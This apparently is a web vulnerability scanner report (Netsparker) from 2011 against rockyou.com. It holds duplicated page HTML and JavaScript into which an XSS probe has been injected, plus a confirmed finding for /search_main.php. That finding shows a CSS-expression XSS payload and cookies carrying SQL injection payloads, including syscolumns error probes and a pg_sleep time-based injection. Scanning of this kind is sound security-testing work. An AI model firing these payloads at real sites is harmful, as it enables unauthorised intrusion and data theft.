newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="create-slideshow-js-combined.php?ver=2" type="text/javascript"></script><script src="/js/greybox/jquery-latest.js" type="text/javascript"></script><script src="/js/greybox/greybox.js?2" type="text/javascript"></script><script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
<link href="/css/create-slideshow-combined.css?ver=6" rel="stylesheet" type="text/css"><link href="/css/../js/greybox/greybox.css?ver=6" rel="stylesheet" type="text/css">
</HEAD>
<BODY class="background_normal"
style=""
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload="initDND();"
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="height:5px;padding:0px;margin:0px;overflow:hidden"></div>
<script language="javascript" type="text/javascript" src="/js/flash_file_uploader.js"></script><script language="javascript" type="text/javascript" src="/js/iuembed.js"></script><script type="text/javascript">// Suppress multifile uploadervar suppressMulti = false;// variable needed for grey box modal dialog for the 'More Songs' linkvar GB_ANIMATION = true; // we have a variable in create.js that needs to know about the right translation for a text.var lang_upload_confirm_delete_slide = "Do you really want to delete this slide?";var lang_slideshow_aspect_43_only = "Only 4:3 Available";var lang_slideshow_aspect_43 = "TV (4:3)";var lang_slideshow_aspect_21 = "Wide (2:1)";var lang_slideshow_aspect_31 = "Strip (3:1)";var lang_empty_caption = "[Click to Add a Caption]";var lang_remove_all_captions = "Are you sure you want to remove all captions?";var lang_abandon_slideshow = "Abandon this slideshow and START OVER?";var evalThis;var thisinstanceid = ''"--></style></script><script>netsparker(0x0025FA)</script>';var tagListArray; var xmlreqs = true; //Disable / enable xmlrequestsvar xmlBatchReq = ""; //Batch Stringvar playingSong = 0; //Current Song that is playingvar storedSongList = ""; //List of Songs responde from AJAXvar statusAddingSong = false;var mycustomtabs = new Array("cattags","transitions","themes","skins","backgrounds", "music","privacy","size","caption","min");var openWithCreateMode = 0;var sizeLevel = 3;var pitchLearnMoreBeboBands = 1; var slideCount = 0;var beforeUnloadStatus = 0;var beforeUnloadStatusEnabled = 1;var bgColorManualSet = 0;var ghost_popup = new Ghost_Popup('ghost_popup');var ghost_popup_music = new Ghost_Popup('ghost_popup_music');var source = "";var currentSkin = '';var currentTransition = '';var currentBackground = '';var currentTheme = '';var currentRatio = 0;var skinConfig = 1;var removePreviewSlide = 0;var slideShowCount="0";//var slideShowCount="0";embed = new appEmbed(thisinstanceid);membed = new musicEmbed(thisinstanceid);embed.setLocal(true);embed.noSound=true;embed.noShare=true;function confirmAbandon() { if (openWithCreateMode == 1 && slideCount > 0 && beforeUnloadStatus == 1) { event.returnValue = "If you continue, this slideshow will be abandoned!"; } beforeUnloadStatus = beforeUnloadStatusEnabled;}function initDND() { document.getElementById('loadingsection_container').className = 'background_normal'; // for partner sites, switch to smaller logo var partner_logo_big = document.getElementById("partner_logo_big"); var partner_logo_small = document.getElementById("partner_logo_small"); if (partner_logo_big) partner_logo_big.style.display = "none"; if (partner_logo_small) partner_logo_small.style.display = "block"; var rockyou_logo = document.getElementById("logo"); if (rockyou_logo) rockyou_logo.style.display = "block"; setupFileUploader(); printCountrySelect(document.getElementById("countryselect")); document.getElementById('loadingsection').innerHTML = ''; document.getElementById('loadingsection').style.display = 'none'; document.getElementById('ticker_area').style.display=""; document.getElementById('upload-and-customize').style.display=""; var bannerheading = document.getElementById('bannerheading'); if (bannerheading) bannerheading.style.display=""; initSectionsNew();}function initSectionsNew(){ supermaxUL(); //document.getElementById('toptab-container').style.display=""; document.getElementById('uploadsection').style.display=""; showUploadDiv(); hasInstanceIDEmbed(); simple_ajax_call('email/ajax_email_tracking.php?message=3&widget=slideshow&instanceid=0', false); openWithCreateMode = 1; document.getElementById("bebo_bubble").style.display = "block";}function initSections(){ if (openWithCreateMode == 1) { // randomize transition updateTransition("photostack2"); } document.getElementById('arrange-and-caption').style.display=""; document.getElementById('quickstyles').style.display=""; document.getElementById('div-upload').style.display=""; document.getElementById('tab-customize').style.display=""; document.getElementById('div-arrange').style.display=""; embed.isScale = false;currentSkin = ''; currentTransition = 'photostack'; currentRatio = 1; skinConfig = 1; currentTheme = ''; currentBackground = ''; setAspectRatioControls(); setBackgroundControls(); setSkinControls(); setSizeControls(); showCookieUploadTab(); showCustomizeDiv(); regUL(); refreshSlideShow(); refreshMusic(0); //Tags tagListArray = []; tagList(tagListArray); setPeopleMap('','','',''); //Songs songListArray = []; songList(songListArray); if (openWithCreateMode == 1) { simple_ajax_call('email/ajax_email_tracking.php?message=4&widget=slideshow&instanceid='+thisinstanceid, false); Set_Cookie('last_created_slideshow', thisinstanceid, 1); } else { if (thisinstanceid != parseInt(Get_Cookie('last_created_slideshow'))) { Set_Cookie('last_created_slideshow', 0, 1); } } // change the instruction var multi_uploader_instruction = document.getElementById("multi_uploader_instruction"); if (multi_uploader_instruction) { multi_uploader_instruction.innerHTML = '<p style="font-size:16px;font-weight:bold;margin-bottom:10px;">Next steps</p>' + '<ul style="font-size:13px;margin-left:10px;">' + '<li>Add more slides</li>' + '<li>To edit captions, scroll down</li>' + '<li>To move and delete slides, scroll down</li>' + '<li>Try the customization options to the right</li>' + '<li>Click Save when you\'re done</li>' + '</ul>' + '<p style="font-size:15px;margin-top:15px;">If you\'re having trouble uploading, <a target="_blank" href="/contact.php" style="text-decoration:underline">let us know</a>.</p>'; } setDefaultPublishSize(3); if (Get_Cookie('bubble_html_file_upload_edit_hide') == null) { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_bottom'; } } else { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_hidden'; } } document.getElementById("bebo_bubble").style.display = "none"; if (Get_Cookie('bubble_save_hide') == null) { document.getElementById("bubble_save1").style.display = "block"; } else { document.getElementById("bubble_save1").style.display = "none"; } //Colors loadSV(); updateH('F1FFCC'); if (window.attachEvent) { window.attachEvent("onbeforeunload", confirmAbandon); } balance_tabs_reset(); setTimeout("balance_tabs_set();", 1000);}function hasInstanceIDEmbed(){ var loc = window.location.href; var instanceString = loc.match("#instanceid=([0-9]*)"); if (instanceString != null) { if (parseInt(instanceString[1]) > 0) window.location='slideshow-create.php?refid=3&create=1&instanceid='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0025FA)%3C/script%3E&create=1&instanceid='+instanceString[1]; }}// Flash uploader calls this function when the user has chosen image(s) to upload and on initfunction beginFlashUpload() { var initObj = {}; initObj.instanceid = thisinstanceid; initObj.infront = (document.getElementById('uploadplace').infront.checked) ? true : false; initObj.dataHost = 'http://www.rockyou.com/addimage.php?type=file_html&userid=-1'; return initObj;}// Called on return of flash uploaderfunction flashUploadComplete(instanceid, errorcode, errormessage) { urchinTracker('/flashuploader/complete'); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(true); embed.noSound=true; embed.noShare=true; //Reload page with slideshow var location = window.location.href; if (location.indexOf('?') != -1) location += "&instanceid="+instanceid; else location += "?instanceid="+instanceid; window.location = location; } else { if (parseInt(errorcode) > 0) { document.getElementById('ulerror').style.display=''; document.getElementById('ulerror').innerHTML=errorcode + " - " + errormessage; } else { document.getElementById('ulerror').innerHTML=""; document.getElementById('ulerror').style.display='none'; refreshList(); clearCaptions(); clearEntry(); } if (removePreviewSlide == 1) { setTimeout('xmlhttpPost("remove_preview_slide", 1);', 1000); removePreviewSlide = 0; } }}function uploadComplete(errorcode, errormessage, url, instanceid){ if (parseInt(errorcode) > 0) { ghost_popup.show("photo upload failed", 13, 10, 60, 100, 1, "frm"); } else { ghost_popup.show("photo uploaded", 13, 10, 60, 100, 1, "frm"); } var form2 = document.getElementById("form2"); if (form2) { form2.reset(); } hideUploading(); clearInterval(progressInterval); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); ..
Date: Mon, 18 Apr 2011 23:00:03 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 23:00:02 GMT; path=/; domain=.rockyou.com,lastlogin=1303167603; expires=Wed, 27-Jul-2011 23:00:03 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 23:00:03 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=23713 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 26959
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="create-slideshow-js-combined.php?ver=2" type="text/javascript"></script><script src="/js/greybox/jquery-latest.js" type="text/javascript"></script><script src="/js/greybox/greybox.js?2" type="text/javascript"></script><script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
<link href="/css/create-slideshow-combined.css?ver=6" rel="stylesheet" type="text/css"><link href="/css/../js/greybox/greybox.css?ver=6" rel="stylesheet" type="text/css">
</HEAD>
<BODY class="background_normal"
style=""
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload="initDND();"
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="height:5px;padding:0px;margin:0px;overflow:hidden"></div>
<script language="javascript" type="text/javascript" src="/js/flash_file_uploader.js"></script><script language="javascript" type="text/javascript" src="/js/iuembed.js"></script><script type="text/javascript">// Suppress multifile uploadervar suppressMulti = false;// variable needed for grey box modal dialog for the 'More Songs' linkvar GB_ANIMATION = true; // we have a variable in create.js that needs to know about the right translation for a text.var lang_upload_confirm_delete_slide = "Do you really want to delete this slide?";var lang_slideshow_aspect_43_only = "Only 4:3 Available";var lang_slideshow_aspect_43 = "TV (4:3)";var lang_slideshow_aspect_21 = "Wide (2:1)";var lang_slideshow_aspect_31 = "Strip (3:1)";var lang_empty_caption = "[Click to Add a Caption]";var lang_remove_all_captions = "Are you sure you want to remove all captions?";var lang_abandon_slideshow = "Abandon this slideshow and START OVER?";var evalThis;var thisinstanceid = ''"--></style></script><script>netsparker(0x0025FA)</script>';var tagListArray; var xmlreqs = true; //Disable / enable xmlrequestsvar xmlBatchReq = ""; //Batch Stringvar playingSong = 0; //Current Song that is playingvar storedSongList = ""; //List of Songs responde from AJAXvar statusAddingSong = false;var mycustomtabs = new Array("cattags","transitions","themes","skins","backgrounds", "music","privacy","size","caption","min");var openWithCreateMode = 0;var sizeLevel = 3;var pitchLearnMoreBeboBands = 1; var slideCount = 0;var beforeUnloadStatus = 0;var beforeUnloadStatusEnabled = 1;var bgColorManualSet = 0;var ghost_popup = new Ghost_Popup('ghost_popup');var ghost_popup_music = new Ghost_Popup('ghost_popup_music');var source = "";var currentSkin = '';var currentTransition = '';var currentBackground = '';var currentTheme = '';var currentRatio = 0;var skinConfig = 1;var removePreviewSlide = 0;var slideShowCount="0";//var slideShowCount="0";embed = new appEmbed(thisinstanceid);membed = new musicEmbed(thisinstanceid);embed.setLocal(true);embed.noSound=true;embed.noShare=true;function confirmAbandon() { if (openWithCreateMode == 1 && slideCount > 0 && beforeUnloadStatus == 1) { event.returnValue = "If you continue, this slideshow will be abandoned!"; } beforeUnloadStatus = beforeUnloadStatusEnabled;}function initDND() { document.getElementById('loadingsection_container').className = 'background_normal'; // for partner sites, switch to smaller logo var partner_logo_big = document.getElementById("partner_logo_big"); var partner_logo_small = document.getElementById("partner_logo_small"); if (partner_logo_big) partner_logo_big.style.display = "none"; if (partner_logo_small) partner_logo_small.style.display = "block"; var rockyou_logo = document.getElementById("logo"); if (rockyou_logo) rockyou_logo.style.display = "block"; setupFileUploader(); printCountrySelect(document.getElementById("countryselect")); document.getElementById('loadingsection').innerHTML = ''; document.getElementById('loadingsection').style.display = 'none'; document.getElementById('ticker_area').style.display=""; document.getElementById('upload-and-customize').style.display=""; var bannerheading = document.getElementById('bannerheading'); if (bannerheading) bannerheading.style.display=""; initSectionsNew();}function initSectionsNew(){ supermaxUL(); //document.getElementById('toptab-container').style.display=""; document.getElementById('uploadsection').style.display=""; showUploadDiv(); hasInstanceIDEmbed(); simple_ajax_call('email/ajax_email_tracking.php?message=3&widget=slideshow&instanceid=0', false); openWithCreateMode = 1; document.getElementById("bebo_bubble").style.display = "block";}function initSections(){ if (openWithCreateMode == 1) { // randomize transition updateTransition("photostack2"); } document.getElementById('arrange-and-caption').style.display=""; document.getElementById('quickstyles').style.display=""; document.getElementById('div-upload').style.display=""; document.getElementById('tab-customize').style.display=""; document.getElementById('div-arrange').style.display=""; embed.isScale = false;currentSkin = ''; currentTransition = 'photostack'; currentRatio = 1; skinConfig = 1; currentTheme = ''; currentBackground = ''; setAspectRatioControls(); setBackgroundControls(); setSkinControls(); setSizeControls(); showCookieUploadTab(); showCustomizeDiv(); regUL(); refreshSlideShow(); refreshMusic(0); //Tags tagListArray = []; tagList(tagListArray); setPeopleMap('','','',''); //Songs songListArray = []; songList(songListArray); if (openWithCreateMode == 1) { simple_ajax_call('email/ajax_email_tracking.php?message=4&widget=slideshow&instanceid='+thisinstanceid, false); Set_Cookie('last_created_slideshow', thisinstanceid, 1); } else { if (thisinstanceid != parseInt(Get_Cookie('last_created_slideshow'))) { Set_Cookie('last_created_slideshow', 0, 1); } } // change the instruction var multi_uploader_instruction = document.getElementById("multi_uploader_instruction"); if (multi_uploader_instruction) { multi_uploader_instruction.innerHTML = '<p style="font-size:16px;font-weight:bold;margin-bottom:10px;">Next steps</p>' + '<ul style="font-size:13px;margin-left:10px;">' + '<li>Add more slides</li>' + '<li>To edit captions, scroll down</li>' + '<li>To move and delete slides, scroll down</li>' + '<li>Try the customization options to the right</li>' + '<li>Click Save when you\'re done</li>' + '</ul>' + '<p style="font-size:15px;margin-top:15px;">If you\'re having trouble uploading, <a target="_blank" href="/contact.php" style="text-decoration:underline">let us know</a>.</p>'; } setDefaultPublishSize(3); if (Get_Cookie('bubble_html_file_upload_edit_hide') == null) { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_bottom'; } } else { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_hidden'; } } document.getElementById("bebo_bubble").style.display = "none"; if (Get_Cookie('bubble_save_hide') == null) { document.getElementById("bubble_save1").style.display = "block"; } else { document.getElementById("bubble_save1").style.display = "none"; } //Colors loadSV(); updateH('F1FFCC'); if (window.attachEvent) { window.attachEvent("onbeforeunload", confirmAbandon); } balance_tabs_reset(); setTimeout("balance_tabs_set();", 1000);}function hasInstanceIDEmbed(){ var loc = window.location.href; var instanceString = loc.match("#instanceid=([0-9]*)"); if (instanceString != null) { if (parseInt(instanceString[1]) > 0) window.location='slideshow-create.php?refid=3&create=1&instanceid='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0025FA)%3C/script%3E&create=1&instanceid='+instanceString[1]; }}// Flash uploader calls this function when the user has chosen image(s) to upload and on initfunction beginFlashUpload() { var initObj = {}; initObj.instanceid = thisinstanceid; initObj.infront = (document.getElementById('uploadplace').infront.checked) ? true : false; initObj.dataHost = 'http://www.rockyou.com/addimage.php?type=file_html&userid=-1'; return initObj;}// Called on return of flash uploaderfunction flashUploadComplete(instanceid, errorcode, errormessage) { urchinTracker('/flashuploader/complete'); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(true); embed.noSound=true; embed.noShare=true; //Reload page with slideshow var location = window.location.href; if (location.indexOf('?') != -1) location += "&instanceid="+instanceid; else location += "?instanceid="+instanceid; window.location = location; } else { if (parseInt(errorcode) > 0) { document.getElementById('ulerror').style.display=''; document.getElementById('ulerror').innerHTML=errorcode + " - " + errormessage; } else { document.getElementById('ulerror').innerHTML=""; document.getElementById('ulerror').style.display='none'; refreshList(); clearCaptions(); clearEntry(); } if (removePreviewSlide == 1) { setTimeout('xmlhttpPost("remove_preview_slide", 1);', 1000); removePreviewSlide = 0; } }}function uploadComplete(errorcode, errormessage, url, instanceid){ if (parseInt(errorcode) > 0) { ghost_popup.show("photo upload failed", 13, 10, 60, 100, 1, "frm"); } else { ghost_popup.show("photo uploaded", 13, 10, 60, 100, 1, "frm"); } var form2 = document.getElementById("form2"); if (form2) { form2.reset(); } hideUploading(); clearInterval(progressInterval); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); ..
|
- /search_main.php
/search_main.php CONFIRMED |
Parameters
| Parameter | Type | Value |
| s_tsearch | GET | ' stYle=x:expre/**/ssion(alert(9)) ns=' |
| p | GET | 1 |
Request
GET /search_main.php?s_tsearch='%20stYle=x:expre/**/ssion(netsparker(9))%20ns='%20&p=1 HTTP/1.1
Referer: http://www.rockyou.com/featuredartists.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=9eea1s66tbmof79ujd25v61ml3; lang=en; lastlogin=1303167633; ctid=3; istack=3%7Cwww202.rockyou.com%7C%7C%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29%7Cwww202.rockyou.com%7C%7C%27%2B+%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29+%2B%27%7Cwww202.rockyou.com%7C%7Cconvert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29%7Cwww202.rockyou.com%7C%7C%27%2B+convert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29+%2B%27%7Cwww202.rockyou.com%7C%7C%27AND+1%3D%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7CNSFTW%7Cwww202.rockyou.com%7C%7C%27%2BNSFTW%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--; sns_type=rockyou.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://www.rockyou.com/featuredartists.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=9eea1s66tbmof79ujd25v61ml3; lang=en; lastlogin=1303167633; ctid=3; istack=3%7Cwww202.rockyou.com%7C%7C%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29%7Cwww202.rockyou.com%7C%7C%27%2B+%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29+%2B%27%7Cwww202.rockyou.com%7C%7Cconvert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29%7Cwww202.rockyou.com%7C%7C%27%2B+convert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29+%2B%27%7Cwww202.rockyou.com%7C%7C%27AND+1%3D%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7CNSFTW%7Cwww202.rockyou.com%7C%7C%27%2BNSFTW%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--; sns_type=rockyou.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
